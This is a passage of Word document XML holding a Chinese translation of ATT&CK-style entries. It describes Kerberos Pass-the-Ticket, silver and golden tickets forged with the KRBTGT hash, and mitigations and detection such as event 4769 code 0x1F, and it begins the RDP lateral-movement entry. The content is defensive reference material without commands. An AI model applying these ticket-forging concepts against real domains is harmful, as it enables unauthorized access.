          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>的服务票据或票据授予票据（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TGT</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>具体取决于</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问级别。服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>票据</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许访问特定资源，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TGT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>票据</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>授予服务（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TGS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）请求服务票据</w:t>
      </w:r>
      <w:r>
        <w:t>，用来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户有权访问的任何资源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C35F7B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PtT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术</w:t>
      </w:r>
      <w:r>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制的服务获取白银</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>票据</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并用于生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>票据来</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问特定资源和承载该资源的系统（例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SharePoint</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3932BA37" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>tT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术还</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用密钥分发服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KRBTGT</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帐户</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得域的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黄金票据</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动</w:t>
      </w:r>
      <w:r>
        <w:t>目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的任一</w:t>
      </w:r>
      <w:r>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TGT</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1EA339" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="0012481B" w14:paraId="0B4D0ADD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3468BA58" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0012481B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0012481B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="30C18661" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0012481B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0012481B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="35C43029" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25A668AC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId208" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>活动目录配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C0A64A6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>为了遏制先前生成的黄金票据的影响，请两次重置内置的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>KRBTGT</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>账号密码，这会使得用</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>KRBTGT</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>哈希创建的任何现有黄金票据以及由此生成的其他</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Kerberos</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>票据均无效。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="3A2A1045" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42787879" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId209" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22B2A329" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保本地管理员账号有复杂且唯一的密码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="1BE282F7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ABEFFA1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId210" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C61B828" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将域管理员账号权限限制给域控制器和受限服务器。委派其他管理功能来区分账号。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="7F0C0A93" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BC70C8E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId211" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E3980B8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不允许用户成为多个系统的本地管理员。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BFEB3CC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45445F78" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F4792" w14:textId="5D059B72" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审核所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用事件，并检查是否存在差异。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与其他可疑活动（例如，编写和执行二进制文件）相关的异常远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份认证事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4439A918" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F63CC9" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在两次重置</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KRBTGT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黄金票据时，在域控制器上会生成事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4769</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。状态代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x1F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于“已解密字段完整性检查失败”而导致操作失败，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也即</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先前无效的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黄金票据</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>人</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13F8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>滥用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7318DDB3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00991CCE" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991CCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>远程</w:t>
      </w:r>
      <w:r w:rsidRPr="00991CCE">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>桌面协议</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w14:paraId="295AB736" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BFE1005" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>T1076</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CB94A2F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>技术：横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B5FDA05" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="573BCFDA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用了</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，且</w:t>
            </w:r>
            <w:r>
              <w:t>有</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程桌面用户</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>群</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组中的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA1B68A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>所需权限：远程桌面用户，用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E48587" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E36B21" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId212" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00FE38DE">
                <w:t>CAPEC-555</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
